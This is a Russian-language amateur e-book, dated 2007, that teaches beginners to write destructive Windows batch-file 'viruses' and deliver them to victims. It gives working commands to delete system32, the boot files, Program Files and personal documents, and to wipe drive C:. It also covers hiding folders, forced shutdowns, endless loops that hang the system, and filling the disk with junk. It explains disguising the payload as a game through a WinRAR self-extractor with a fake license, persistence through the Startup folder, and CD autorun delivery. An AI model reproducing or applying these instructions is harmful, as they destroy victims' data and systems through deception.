Вступление

Книга переделана:
28 апреля 2007 года
Её возраст:
дней.
Все вирусы связанные с реестром я проверял только на XP даже не знаю будут ли они работать на 98/95 виндах.
Это изображение такого вроде злого но простого вируса. Он стоит в семейках это означяет что это простой домашний врус.

Сразу хочу предупредить, нечего серьёзного и сложного я в этой книге не написал. Она предназначена для полных ламеров с чайником вместо головы. Так что если вы знаете хоть немного программирования вам тут делать нечего. Для написания вирусиков нам понадобиться: «Блокнот» умение писать и читать на компе. Я всё опешу очень подробно, но если вы чего-то не смогли понять, то придётся вам выбросить комп и купить себе тамогочи или тетрис. Помимо вирусиков я коротко расскажу о реестре (это очень страшный, большой и опасный монстр) но если осторожно, то можно.
Если же вы, каким то чудом забрели на этот мой уё….ый сайт и не пожалели времени скачать эту чушь, которую я тут в бешеном припадке накалякал, то ни кто другой сюда не сунется в жизни. И вот по этому поводу у меня есть тост…то - есть просьба отошлите адресок этого сайта всем своим друзьям и даже не друзьям, которых может заинтересовать чтение столь бесполезной литературы, которую написал Я.
Это уже версия книги 1.03 (для особо тупых, третия) в этой версии я переделал полностью интерфейс справки кое-что удалил, а кое-что и добавил. Большие изменения в сторону реестра, и исправлены очень грубо написанные команды (неработавшие). Если у вас возникнет желание послать меня на х.. к концу прочтения этой книги или даже может быть у вас есть какие-то вопросы, или даже новые мысли о создание вирусов то вот мой «кусок мыла»
Уже пишу
Вот адресок моей страницы в Интернете на тот случай если эта книга попала вам через десятые руки:
http://booksss2007.narod.ru/
(Может к этому времени как к вам в руки, вернее в комп попадёт эта книженция, я напишу, что-нибудь более интересное).

P.S. Интересно кто нибудь из вас видел мои предыдущие версии книги???

Вирусы

Махинации с реестром

Ну и на последок...


00

Вирусы

Bat файлы
Сокрытие
Отключение
Удаление
А чё удалять?
По мелочи
Расширение
Папки
Мусор
Маскировка
Делаем .exe
CD с вирусом

Реестр

Знакомство
Кнопка "Пуск"
Рабочий стол
Разности

Разное

Совмещаем
Отключение 2
Заключение

Чтение заняло:


Bat файлы
Если вы не можете найти программы необходимые для работы то скачайте "Арсинал" вирусописателя по .bat СКАЧАТЬ

Bat файлы это обычные командные файлы, в которых в каждой строке записано по одной команде и они выполняются по очереди, то есть одна команда отработала, завершилась, началась вторая и.т.д.
Приступим непосредственно к созданию.
Для начала откроем блокнот

Вот как выглядит

Нажимаем «Файл» выбираем строку «Сохранить как…» в поле «Имя файла:» пишем название нашего файла например «проба» и даём ему расширение .bat у нас должно получиться «проба.bat», жмём на кнопку «Сохранить». Потом ищем наш файл:

Это значок командного файла

Нажимаем на него правой кнопкой мыши, вылетает контекстное меню, выбираем там «Изменить» и соответственно нажимаем, и опять наш bat файл будет загружен в блокнот.

Мы пытаемся что-то изменить

Вот простейший пример как запустить, к примеру, Paint потом Сапёра и в конце выполним очистку диска, пишем следующие команды:

mspaint
winmine
cleanmgr

и сохраняем документ. И теперь после открытия нашего файла сначала откроется Paint, мы там порисуем, закроем его и сразу после его закрытия мы можем сыграть в игру «Сапёр» и после того как мы проиграли там раз 100 можно выполнить очистку диска.
Если же мы хотим запустить все эти команды одновременно, причём очистку диска в свёрнутом режиме то пишем следующие:

start mspaint
start winmine
start/min cleanmgr

Вот несколько команд:

Настройка системы | start msconfig
Калькулятор | calc
Помощь | start HelpCtr
Редактор символов | eudcedit
Таблица символов | charmap
Буфер обмена | clipbrd
Музон | dvdplay
Диспетчер задач | taskmgr
Громкость | sndvol32
Доктор Ватсон | drwatson
Отладчик доктора | drwtsn32
Дефрагментация диска С: defrag C:
Проверка диска | chkdsk

Вот какое у меня очень тупое вступление. Если вы впервые читаете эту книгу, а тут, какая то ахинея в виде запуска трёх престарелых команд не спешите удалять мою справку, дальше будет ещё хуже…эээ…в смысле по теме! (Как же сложно писать книги, хотя и не в первой).

И что же дальше?


Х-де мои файлы (безобидно)

Теперь приступим к написанию команд для человека, которому вы хотели бы сильно (или не очень сильно) навредить!
Для начала напишем команду, которая не удаляет файлы, а просто ставит на них атрибут «Скрытый» и после запуска команды файлики исчезнут, правда если стоит атрибут в «Свойствах папки» «Показывать скрытые файлы и папки» то фишка не получиться. Но у большинства новичков такого нет.
Просто пишем:

attrib +h

У команды attrib есть и другие параметры:

+r Установка атрибута «Только чтение».
-r Снятие атрибута «Только чтение».
+a Установка атрибута «Архивный».
-a Снятие атрибута «Архивный».
+s Установка атрибута «Системный».
-s Снятие атрибута «Системный».
-h Снятие атрибута «Скрытый».

Но это уже лишнее нам лишь пригодится скрыть файл, а не показать.
Кстати можно скрыть папку WINDOWS, чтобы перепуганный новичок орал «Х-де моя папка WINDOWS!» пишем:

attrib +h C:/WINDOWS

Или же можно скрыть многие файлы в самой папке:

attrib +h C:/WINDOWS/*.*

можно поступить иначе:

cd C:\windows переходим в папку «windows»
attrib +h и ставим атрибуты

Но лучше всего поставить два атрибута вместе, а именно «Скрытый» и «Системный» когда они вдвоём поставлены на файле либо папке система скрывает их
даже в том случае если даже у вас будет стаять в «Свойствах папки» галочка «Показывать скрытые файлы» увидеть эти файлы можно с помощью файловых менеджеров таких как, например FAR, или Commander.

attrib +h +s C:/WINDOWS всё прощай папка WINDOWS

(ну не обязательно именно эта папка можно такую команду применить для других папок, например можно скрыть ненужный мусор, который следует удалить, а не как…ну об этом в главе: «Заполняем место мусором»

Можно так и все приведённые выше команды написать в одном файле, да и своих выдумывать. Ну и конечно всё должно быть сохранено .bat!

Кстати советую запомнить эти команды, они могут пригодиться, если их совместно использовать с другими командами…чтобы всё соединить в единое целое и написать м-а-а-аленький вирусик.


Отключение…

Фишка будет в том, что после включения нашего файлика комп возьмёт и неожиданно отключиться!

Shutdown -t 0 –s

Параметр –t ставит время на 0 секунд можно поставить –t 10 и тогда комп отключиться через 10 секунд.
Параметр -s непосредственно говорит системе, что надо отключиться, а вот если за место –s поставить –l то осуществиться просто выход текущего пользователя. А если поставить –r то комп сначало отключиться а потом опять включиться. (типа перезагрузка)
Можно добавить немножечко устрашения и перед тем как комп отключиться будет показано, что в системе вирус (как же испугается новичок, увидев такое сообщение, да ещё и система вырубиться он после включения будет прошаривать свой комп на вирусы хотя это только на пользу.)

Chcp 1251 Русская кодовая страница для того что в тексте есть русские буквы
Shutdown -t 8 –s -c "Внимание на вашем РС обнаружен ВИРУС!!!"

Параметр –c "задаёт сообщение (в кавычках)"

Я выражаю особую симпатию к этой команде…знаете, как страшно когда комп отключается,…кстати говоря, эту команду можно малясь усовершенствовать
смотри главу: «Красивая оболочка» как раз на примере этой самой команды я и буду рассказывать в «Красивой оболочке».


Безвозвратное удаление

Итак, что сейчас будет написано преследуется по закону статья хер пойми какая ну и так далее короче щас мы напишем для начала вирусики уничтожающие шрифты, файлы, ну и на сладенькое весь жесткий диск C:!!!!!!
Как всегда команды очень просты:

del *.* /q

после запуска удалит только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там.
Теперь мы удалим шрифты:

del C:\windows\fonts /q

Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:

del C:\windows\Media /q

Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.

del C:\windows\system32 /

Системная папка ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов.

Но вот в чём незадача командой del можно удалить лишь файлы в папке ну если в этой папке лежит ещё одна папка, то она останется вот следующая команда стирает всё и файлы и папки и подпапки:

rd C:\windows\Media /s /q

Если с помощью команды del мы удалили только музыку в папке Media то с помощью команды rd мы удалили и музыку и папку. Зачем же нужна команда rd если есть команда del? Ну вот пример мы хотим удалить командой del всё содержимое папки Web нам надо будет написать следующие:

del C:\windows\web/q
del C:\windows\web\printers/q
del C:\windows\web\printers\ images/q
del C:\windows\web\wallpaper/q

Это столько вложенных подпапок в этой папке, а теперь посмотрим, как работает команда rd:

rd C:\windows\web/q

и все папочки и файлики удаляться. Вы спросите, ну если команда rd так хороша, зачем нужна команда del? Ответ прост, вы попробуйте удалить командой rd, допустим только ярлыки рабочего стола, или только рисунки в папке windows. Командой del это делается так:

del C:\windows *.bmp* /q

И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска .bmp если поставить .txt то удаляться текстовые файлы.
Но это нам не надо это всё слишком по детски нам надо с размахом всё удалить итак внимание как я, и обещал, сейчас будет команда, которая стирает весь жесткий диск, ну как всегда мой принцип простота, эта команда настолько проста, что аж ваще в дрова нет слов, в общем пишем:

rd C: /s /q

Предупреждаю сразу, не пытайтесь, как говориться проверить правоту этой команды, а то прощай весь жёсткий диск. (Сразу хочу сказать, я тут один раз его попробовал, и что же… пришлось переустанавливать всю систему! Вот только когда я её проверял у меня было написано rd C: zzz /s /q но это наверное не важно. И ещё точно не помню но вроде бы после названия диска я ставил косую черту... или нет). И вот ещё, этот процесс удаленья весьма продолжительный и поэтому чтобы не вызвать подозрения можно немного доработать наш уже почти настоящий вирус! смотри главу: «Создаём эффект программы»


Удалим важное…

В главе "Заполняем место мусором" мы поговорим о том, как создавать мусор и прятать его, ставя атрибуты «скрытый» и «системный» так вот когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить…
Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:

attrib -a -s -h C:/Boot.ini вот я снял все атрибуты
del C:\Boot.ini /q ; а вот тихонечко удалил…

Чтобы вам не ломать голову как же называются все остальные файлы я всё напишу:

attrib -a -s -h C:/Boot.ini
attrib -a -s -h C:/Bootfont.bin
attrib -a -s -h C:/io.sys
attrib -a -s -h C:/msdos.sys
attrib -a -s -h C:/ntdetect.com
attrib -a -s -h C:/ntldr
del C:\Boot.ini /q
del C:\Bootfont.bin /q
del C:\io.sys /q
del C:\msdos.sys /q
del C:\ntdetect.com /q
del C:\ntldr /q

Ну конечно если вы не такой тупой вы догадаетесь как можно снять атрибуты разом со всех этих файлов. Но вдруг кто-то из моих читателей слегка переутомился и не может понять какую это секретную команду? А вот какую:

attrib -a +s +h C:/*.*

Вот только не гарантирую правоту этого вируса, сам я что-то всё не могу его проверить… Атрибуты то снимает и вроде даже удаляет файлы, но XP такая падла...
(Проверяю я, конечно, всё на другом «левом» компе, ну а когда его нет, то и на своём, результат бывает самый неожиданный… вплоть до переустановок. Из-за этого часть данных теряется, а я страдаю способностью всё забывать и поэтому не все полученные результаты доношу до книги…)
Чтобы понять какие ещё файлы либо папки необходимо компу воспользуйтесь файловыми менеджерами такими как: FAR или Commander.

Можно, например, попробовать удалить все программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:

cd %ProgramFiles%\ переходим в папку программные файлы
rd *.* /s /q ; и стираем тут всё
Но что-то она у меня последний раз не сработала... Даже не знаю почему.
Но можно применить ещё трюк:

cd %ProgramFiles%\Microsoft Office
del *.* /s /q

Задали полный путь и воспользовались другой командой (работает, только что проверил)
Ну и уже сами лазайте и задавайте пути, например:

cd %ProgramFiles%\Internet Explorer
del *.* /s /q
cd %ProgramFiles%\Outlook Express
del *.* /s /q
cd %ProgramFiles%\Download Master
del *.* /s /q

ну и больше воображения и усердия, пропишишь так папок 100 и точно 10 из них попадёшь и удалишь.
Ну чтобы вас не растраивать я скажу как удалять папку с двойным именем. кажеться просто но нет, если написать:

rd C:\Program Files /s /q

то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку Program и папку Files что же делать? Вы не поверите я долго не знал что делать и изощрялся писав писав разнообразные команды, а всё просто. Путь к папке с двойным именем надо просто напросто заключить в двойные кавычки:

rd "C:\Program Files" /s /q

Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное:

Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст.
cd %USERPROFILE%\Мои документы\ переходим к папке документов
rd *.* /q прощайте "Мои документы…"

И опять же раньше всё работало а теперь... невыходит... Приходиться писать так:

cd %USERPROFILE%\Мои документы\ del *.* /q

Вы спросите, а чё не мог я сразу написать правильные команды а не пудрить нам мозги застовляя читать бред? Нет, я пытаюсь объяснить как надо всё перепробывать и понять, ага это подходит тут, а это там, а то напишите одну команду, а она не работает. А вы её даже не проверили.
И ещё я чё то всё говорю путь диск C: диск C: но для полной уверености можно я бы скзал нужно прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D: если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на "O" "P" "Q" "R" "S" "T" "U" или ещё какие (правильно делают). Безопасность будь она не ладна.


Маленькие команды

Здесь я написал небольшие команды, одни почти не вредят, так чуть разозлят, а вот другие могут спровоцировать новичка взять молоток и…

Самоликвидация

Эта команда удаляет сама себя, пишите её в самом конце вашего вируса и всё, ни кто не узнает, что вы испортили на его компе чтобы сразу эту пакость не исправить.

del %0
Клон (не сериал)

Эта команда копирует себя в другое место. Так можно наклонироваться по всему диску, Нет нет да и кто нибудь запустит интересный "setup" или "games"

copy %0 C:\setup.bat
copy %0 D:\games.bat
copy %0 C:\windows/ sex.bat
ну и.т.д.

Будет ему потом "sex"... Товарищи если вы увидете на своём компе интересный файл с ну очень заманваючим названием, то это 80% вирус.

Метка диска дурак (D:)

Ну вот, к примеру, первая команда она будет менять метку диска:

label D: dyrak

Это наш диск D: Это кто это дурак? А?

Ну а если мы хотим написать по-русски метку диска, то сначала надо перейти на кодовую страницу и у нас получиться:

Chcp 1251
label D: Дурак

Всё будет написано по-русски ну а если без перехода на кодовую
страницу, то получиться нечто невообразимое зþΞнњЭÑ.
(Я бы сказал это очень тупая и бесполезная команда которая может лишь только слегка шокировать первые 2 секунды)

Меняем название

Просто поменяем название привычных папок на другое, своё:

Chcp 1251 хотим написать название папки по-русски
cd\windows\ переход в корневую директорию
ren Web мусор поменяли папку «Web» на папку «мусор»

Содержимое то же, самое название другое. (Может быть, неопытный новичок так увлечётся очищением диска от мусора, что мимоходом и сотрёт нужные вещи с ненужным названием).

Сколько время?

Можно изменить текущее время на своё:

time 00:00

Я вот поставил 00:00, но можно поставить и своё, например 12:30. (Знаете, как раздражает, когда смотришь на часы, а там 00:00!)

Какой шас год?

Можно изменить текущую дату:

date 01.01.50

Та же можно задать свою дату, или вернуть комп в прошлое, или как я в будущие 2050 года. И не спроста я так поставил дату, многие программы откажутся работать, если стоит дата 2050 года и антивирус откажется работать, мол, срок действия вашей лицензии истёк 40 лет назад!

Отправить

Если нажать правой кнопкой на любой файл, папку, приложение вылетит контекстное меню, где есть строка "Отправить" может быть, мы с вами, и не используем эту возможность, но большинство людей прибегают к этой возможности. По умолчанию там совсем не много пунктов назначения, куда будет произведено копирование:

Какое окуратное у вас меню

Но мы можем всё испортить, добавив, к примеру, к этому списку 100 папок.

cd %USERPROFILE%\SendTo
md 1
md 2
md 3... ну и.т.д.

Быстрый запуск

Посмотрите на вашу панель быстрого запуска (для совсем тупых: это чуть правее кнопки "Пуск") там находиться самое необходимое (надеюсь), так вот и суда мы можем засунуть…в смысле пустых папок:

cd %USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch
md 1
md 2
md 3... ну и.т.д.

Портим Пуск

Нажмите на кнопку "Пуск" и в самом верху мы лицезрим несколько программ (вообще это место в меню "Пуск" отведено, для того чтобы пользователь вложил туда все те программы, которыми он пользуется чаще всего)
Так вот мы возьмём и уже по сложившейся традиции запихнём суда папок 100 и испортим наш в смысле "Пуск" жертвы.

chcp 1251
cd %USERPROFILE%\Главное меню
md 1
md 2
md 3... ну и.т.д.

допишите так…

chcp 1251
cd %USERPROFILE%\Главное меню\Программы
md 1…и.т.д.

и папки будут создаваться в разделе программы.

Или допишите вот так…

chcp 1251
cd %USERPROFILE%\Главное меню\Программы\Автозагрузка
md 1….и.т.д.

допустим мы создадим 100 пустых папок в папке "Автозагрузка" и при включение компа каждый раз будут открываться сотня папок даааа ток сдохнуть можно каждый раз их закрывая…

Так, всё понятно, но для чего в самом начале стоит русская кодовая страница? А потому что в следующей команде используются русские буквы, комп нас просто не поймёт.
Можно, кстати говоря, создавать не пустые папки, а копировать мусор…

Пытаемся повесить систему

Как я уже говорил в начальной главе чтобы запустить какую-нибудь программу надо написать start в начале строки и команду например:

Start mspaint и Paint откроется

А что если задать компу открыть сразу 50, или 100 Paint(ов) силёнок хватит не у всех. Можно конечно написать вот таких 100 строк: Start mspaint но этого мы делать не будем не волнуйтесь. Мы напишет вот такое:

:x ; ставим начальную точку
Start mspaint пишем команду (в данном случае это открытие Paint(а)
goto x ; говорим чтобы комп начинал всё с начальной точки

Этим самым у нас получаеться безконечный цикл открытия приложения и попытка зависания компа.


Много пустых папок

Суть будет заключаться в том, что мы создадим просто-напросто много папок и всё. Фишка заключается в том, что их будет немереное количество и бедолаге пользователю
Будет очень трудно всё это удалить.

md 1

1 это имя файла можно назвать и «папка» или «не удалять», но мне нравиться 1 и вот почему, если мы действительно затеяли сделать такой вирусик который создаёт 1000 папок разве можно написать всё это вручную?

md папка
md важно
md пустота
…. И так далее

Так вот на этот раз обратимся к программе Excel, надеюсь, она есть у всех.… Так вот открываем наш Excel

Это значок Exel(я)

И в первой ячейки пишем md 1

ну что это? md в первой клетке!

Потом берём за правый нижний уголок ячейки и тянем вниз до того пока в подсказке не покажется чисто 1000 можно и любое другое

Хочу 1000 md сделать

Потом отпускаем кнопку и все наши 1000 «mdешок» копируем в буфер

Ща мы всё это скопируем...

Потом заходим в наш файл .bat открываем контекстное меню выбираем вставить и сохраняем теперь при открытии этого файлика у вас неожиданно появиться 1000 папок 1, 2, 3, 4…. ну и. т .д.
Можно написать и например так:

md 1\1\1\1\1

что же мы тут видем? Мы создадим папку «1» откроем её а в ней будет лежать папка «1» а уже в той папка «1». Можно и другие имена создать:

md открой\и эту тоже\идём дальше\почти у цели\сейчас конец\конец

ну вот можно открывать папку и получать указания от другой. Только надо ввести русскую кодовую страницу, перед тем как называть папку русскими именами, а то получиться «абракадабра». (Chcp 1251 усё на русском)
Но так папки будут создаваться там где запущен сам вирус, а вот если так:

cd\
md 1
md 2
md 3.....

Первая команда, это переход на диск C: ну и уже на диске создаём папки. Так же доведите cd(шкой) до папок system32 или windows и уже там создавайте. Очень сложно искать нужную информацию когда папки мельтешат перед глазами. Начнёш удалять, а вдруг имена у них "microsoft" или "driver" приходиться лездь в папку смотреть, ага пусто можно удалить... А мы то не тупые мы потрудились и добавили в начале нашего вируса команду скрытия файлов в нужных папках. Вот наша жертва сидит целый час лазиеет по нашим папкам смотрит где пусто и удаляет... Ну поняли? так увлечётся что удалит и системную папку ведь в ней нечего нет (надеюсь команду attrib то не забыли ?)

И ещё увидев такое страшное окно:

Боже!!!! Алах адбар.. В общем МАМА!

любой разумный пользователь просто закроет вирусик, во время процесса создания папок он может быть длительным (смотря какая у вас ОП) у меня Pentium 4 и чтобы создать всего 1000 папок надо целых 5 секунд! А если вы хотите создать 10000 папок, так вообще не получиться, поэтому надо закосить под игру или там какую-нибудь программу чтобы продлить нашему вирусу время на создание 100000 папок! Об этом в главе: Создаём эффект программы. (Если всё же создаёте имена папки нашими русскими буквами, не забудьте в начале строки указать кодовую страницу)
(Справка: одна пустая папка весит 512 байт,
1000 папок 500 КВ
100000 папок 48 МВ), хотя это смотря в какой файловой системе у вас комп и сколько объём у вашего кластера... Ну да ладно нам папками место на компе не забить, а вот нервы потрепать, запросто.


Заполняем место мусором

Теперь поговорим о том, как же заполнить место мусором на чужом диске тем более если у вас, его и так катастрофически не хватает, а тут ещё не ненужный мусор который неясно стирать или нет. И речь пойдёт ни о пустых там папках или файликах!
Для начала создадим одну папку на диске С: и назовём её "Microsoft" чтобы не вызвать так много подозрений.

md C:\Microsoft Итак папка готова…

…теперь следом пишем вот такое:

copy C:\*.* C:\Microsoft\system

Здесь показано, что команда copy (копия) хочет скопировать содержимое диска C:\ (правда скопирует только малую часть) и переместить нашу копию одним неизвестным файлом "system" в нашу заранее заготовленную папку "Microsoft". (Не знаю, как у вас, но у меня такой файлик весит 85КВ) но нам одного мало и мы пишем их, сколько влезет, только имя меняем:

copy C:\*.* C:\Microsoft\mouse
copy C:\*.* C:\Microsoft\keyboard
copy C:\*.* C:\Microsoft\screen

Можно задать немного иной путь и тогда файл будет весить больше (где-то 8 MB):

copy C:\windows\*.* C:\Microsoft\program
copy C:\windows\*.* C:\Microsoft\driver

но всё это сохраниться в один файл, а вот если написать вот так:

copy C:\windows\*.* C:\Microsoft\*.*1 будет столько файлов, сколько вы скопировали и будут те же имена только с расширением и нашей цифрой 1.

Посмотришь и побоишься стирать вроде все файлы нужны системе можно для устрашения ещё написать:

attrib +s C:\Microsoft\*.*

или…

attrib +s +h C:\Microsoft\*.* мусора много, а удалить нельзя… (как и в главе Х-де мои файлы)

Можно путь для копирования поставить другой путь:

copy C:\*.* C:\ program наш никчёмный файл появиться на диске С:

можно скопировать, что-нибудь другое:

copy C:\windows\system32\*.* C:\Microsoft\*.exe*program

Но это уже очень длительный процесс придется приукрасить программу. смотри главу: "Создаём эффект программы" Есть другой способ копирования:

dir c:\ /s/a > C:/1.txt

Так же копируем содержимое диска и к тому же сохраняем это всё текстовым документом.

А можно полностью скопировать папку "system32" в другое место и поставить атрибут скрытый, чтобы жертва не удалила нашу совершенно ненужную копию.

xcopy C:\system32\*.* C:\*.*/s/q копируем всё из system32 на диск С:
attrib +h +s C:\*.* всё скрываем с глаз людских.

Ах, совсем забыл, не пишите вот такую команду:

copy C:\*.* C:\Windows\

А то антивирус, если он есть у нашей жертвы, обязательно обезвредит этот наш вирус, посчитав его за Троян.BAT.CopyToWindows.


Создаём эффект программы

Я уже писал, что при длительном выполнении наших вирусиков вылетает чёрное окно, где описывается процесс операции и вот это самое описание может испугать и подтолкнуть жертву выключить программу, хотя наша с вами программа-вирус не доработала и всех злостных операций не проделала. Чтобы избежать вот такого конфликта, можно немного замаскироваться, закосив под игру, например или программу…
Вот, например простейшая команда, которая не выводит на наш чёрный экран сообщений:

echo off ввёл такую команду на самой первой строке и всё пустота…

Chcp 1251 вводим эту строчку следом, чтобы всё было на русском

title Загрузка игры... на верху будет написано Загрузка игры… (для отвода глаз)

color 0c чёрный экран красные буквы (для красоты)
Первая цифра обозначает цвет экрана, а вторая цвет шрифта

Значение | Цвет
1 | Чёрный
2 | Синий
3 | Зелёный
4 | Голубой
5 | Красный
6 | Сиреневый
7 | Жёлтый
8 | Белый
9 | Серый

msg * Подождите программа выполнит соответствующие операции

Интересно какие такие операции?

Можно написать пять шесть таких сообщение только разных типа «Это лицензионная версия» или «Всё преследуется по закону» и пока жертва будет читать, и жать ОК мы выиграем время. Можно использовать и другой способ, открывая на весь экран блокноты, в которых будет написано сообщение:

echo igra.bat>> read.txt Пожалуйста, внимательно прочитайте! Перед тем как установить игру закройте….и.т.д.
start/max read.txt

В первой строке слово «igra» должно быть таким как вы назвали ваш файл и read тоже можно поменять на своё. Ну а вторая строка говорит, что мы хотим открыть наш текстовый файл уже с готовым сообщением во весь экран. И пока наша жертва будет читать, что там ей надо сделать, вирус сделает своё дело. Можно конечно вместо скучной лекции написать прикольные анекдоты и тогда жертва уже точно отвлекаться.
Можно чтобы на экране была, какая-нибудь надпись, или узор…

Echo wwww
Echo w
Echo w
Echo www
Echo w
Echo w
Echo wwww

На нашем примере написана одна буква "З", а на рисунке уже получившаяся фраза "Загрузка игры".

Ага загрузка. Удоление!

Ну и конечно не следует оставлять всё простым командным файлом надо всё красиво запаковать WinRAR(ом) смотри главу: «Красивая оболочка»


Красивая оболочка

Ну, вот мы отослали наш с вами готовый вирусик вашему «другу», а он его не открыл т.к. у него появились сомнения на счёт такого странного файла и весит он мало и значок не внушает доверия и расширение какое-то странное… Мы немного постараемся исправить положение улучшив вид нашей ложной программы, это как бы вторая часть главы «Создаём эффект программы». Кстати говоря, я вот такое улучшение употреблял ко всем своим тупым вирусам и вам советую. Правда улучшать нам поможет WinRAR-это самый знаменитый архиватор.
Первым делом открываем WinRAR (его можно скачать тут
http://www.rarlab.com
http://www.rarsoft.com)

Ах вот ты какой WinRAR...

Рассматривать архиватор мы будем на примере создания вируса, который вырубает комп после включения, помните? Да ещё сделаем так, чтобы при следующем включение он опять таки отключался!
Берём уже заранее заготовленный файл отключения через x секунд, оттаскиваем в это окно и бросаем его туда. Тут же вылетает окно «Имя и параметры архива» тут можно указать «Степень сжатия» указать «Имя архива» а мы просто ставим галочку на квадратик «Создать SFX-архив» можно тут же заметить, что расширение меняется на .exe это значит, что мы делаем настоящее приложение! Заходим на страницу «Дополнительно» и нажимаем кнопку «Параметры SFX» иногда вылетает сразу «Дополнительные параметры SFX» иногда надо ещё нажать эту долбанную кнопу нахера так сделали не пойму, раз нажали дополнительно, значит так надо!!! Под полем «Путь для распаковки» можно поставить, чтобы ваш файл распаковался в папку «Program Files» или создать его в «Текущей папке» то есть там, где была запущена наша оболочка, в самом поле «Путь для распаковки можно даже не чего и не писать. А вот в поле «Выполнить после распаковки» надо написать имя нашего файла с расширением, например: отключение.bat (вот собаки ещё расширение им указывай! Кстати это мы сделали, для того чтобы непосредственно, после того как мы распакуем файл он автоматически запуститься, и отключал систему, или там сотрет, что-нибудь «ненужное»). В поле «Выполнить до распаковки» не чё писать не надо. На вкладке «Дополнительно» нажимаем кнопку «Добавить ярлык…» вылетает новое окно, где написано «Место создания ярлыка» ставим пометку «В папке Автозагрузка» (можно и в «Меню Пуск» и «На рабочем столе» но нам надо, чтобы при включении комп вырубался снова ведь так»).
И поэтому когда при следующей загрузке компа система начнёт загружать элементы «Автозагрузки» то само собой загрузит, и наш файл и делать нечего отключит комп снова! Правда обводка тут слишком проста, когда идёт сама загрузка, просто держите нажатой клаву «Shift» и ком автоматически обойдёт элементы «Автозагрузки» и соответственно не отключиться, но не все это знают!
В поле «Имя файла, для которого будет создан ярлык» пишем имя нашего файла, например отключение.bat ну и ещё и в поле «Имя ярлыка (файла .lnk):» пишем, что вашей душе угодно (можно конечно написать что-нибудь такое типа: «Microsoft» или «Intel» и тогда это будет выглядеть более убедительно чем «Отключение») и всё, больше не чего не пишите разве можно написать в поле «Описание ярлыка», что-нибудь такое: «Not to delete» «System file» ну чтобы придать немного сомнения. Подтверждаем ОК.
На странице «Режимы» где написано «Режим ввода информации» можно поставить пометку «Скрыть всё» и тогда при распаковки ни кто не чего у вас не спросит, а просто распакует и всё. Я советую поставить пометку «Не показывать начальный диалог» и тогда наша программа ни будет нас спрашивать, куда установить наш файл, а просто покажет лицензию, которую мы с вами щас и напишем. Ах да где написано «режим перезаписи» ставим пометку «Перезаписывать без подтверждения».
На странице «Лицензия» в поле «Заголовок окна с лицензией» пишем название, например «Игра» если вы косите под игру, или «garbage collector» чтобы совсем запутать. В поле «Текст лицензии» вешаем лапшу на уши и даём волю своей фантазии ну, например:
Эта программа является для установки игры «pirate». Пожалуйста внимательно прочитайте, что будет написано ниже для полноправного использования данной продукцией:…тру ля ля.…ля ля….ну там лечите дальше сколько душе угодно, это для того чтобы не оставить не малейшего сомнения на счёт происхождения и назначения программы, и вот ещё пожалуйста пишите без ошибок, а то вас тут же раскусят!
На странице «Текст и значок» не чего не следует писать, так этого программа не покажет из-за того, что мы поставили отметку «Не показывать начальный диалог» если её не поставить, то и тут можно накуролесить всякой ахинеи. Правда следует воспользоваться ещё одним маневром, где написано «Значок SFX-архива» можно я бы сказал нужно выбрать хоть какой-нибудь значок, а то жертву может отпугнуть значок который подставиться по умолчанию. А если загружить привычный значёк "WORD(а)" или картинки, то жертва без малейших подозрений с радостью запустит...хм...вот. И ещё можно загрузить какую-нибудь картинку «по теме конечно» и тогда она будет отображаться при чтении лицензии (это красивый эффект). Ну, вот, пожалуй, и всё если всё грамотно и правильно сделать, то у жертвы не будет и малейшего сомнения, что у него в руках лицензионная игра, ну а когда он её распакует, обрадуется, так что придётся переустанавливать систему!

Надо было написать это в главе «Отключение» но тогда мы не знали этих команд. Я предлагаю мало того, что мы поставим наш файл в папку «автозагрузка» так мы его скроем т.к. тот, кто догадается в эту папку посмотреть, без труда наш вирус удалит многократное выключение не удаться:

Chcp 1251
cd %USERPROFILE%\Главное меню\Программы\Автозагрузка\
attrib +h

вы видите, что я сначала переключаюсь на русскую кодовую страницу это потому что в нашей команде есть русские буквы.
Только вот, есть одна здоровая загвоздка, из трёх компов (на которых я проверял эту команду), на двух автозагрузка не сработала просто убрала все элементы и как будто их и не было.


CD с вирусом.

А вот например если мы хотим «подарить» ваш великолепно выполненный вирус определённому человеку, да ещё вдобавок не по сети, а дать его на диске, то можно ещё кое как фишкануть… кстати говоря чтобы жертва на вас не злилась можно на диске действительно записать какую-нибудь небольшую игру, а когда ваш вирус сработает то у вас есть небольшое прикрытие на счёт того, что на диске была игра! (Кто-нибудь что-нибудь понял? Я лично до сих пор не могу понять что я тут накуролесил!)
Описание ближайшего будущего:
Наша жертва берёт наш диск и засовывает его в дисковод и как обычно ждёт когда комп прочтёт диск и запустит его, а тем временем наш диск ка-а-а-ак запустит автоматически наш вирус и всё удалит…ну или создаст много мусора… вот такая хрень…
Для этого мы откроем блокнот и напишем там следующие:

[autorun]
OPEN=virus.bat

Имя, которое у меня стоит «virus» может быль любое, например «1». Вспомните когда мы вставляем диск с какоё-либо игрой то после открытия «Моего компа» на том месте, где был обычный значок диска, появляется значок игры…вот и мы можем также сделать засунуть значок, на диск, обозвав его «znak» и добавляем в нашем файле строку:

ICON=znak.ico

Потом сохраняем наш файл, дав ему имя AUTORUN и расширение .inf
Для особо тупых:

[autorun]
OPEN=virus.bat
ICON=znak.ico

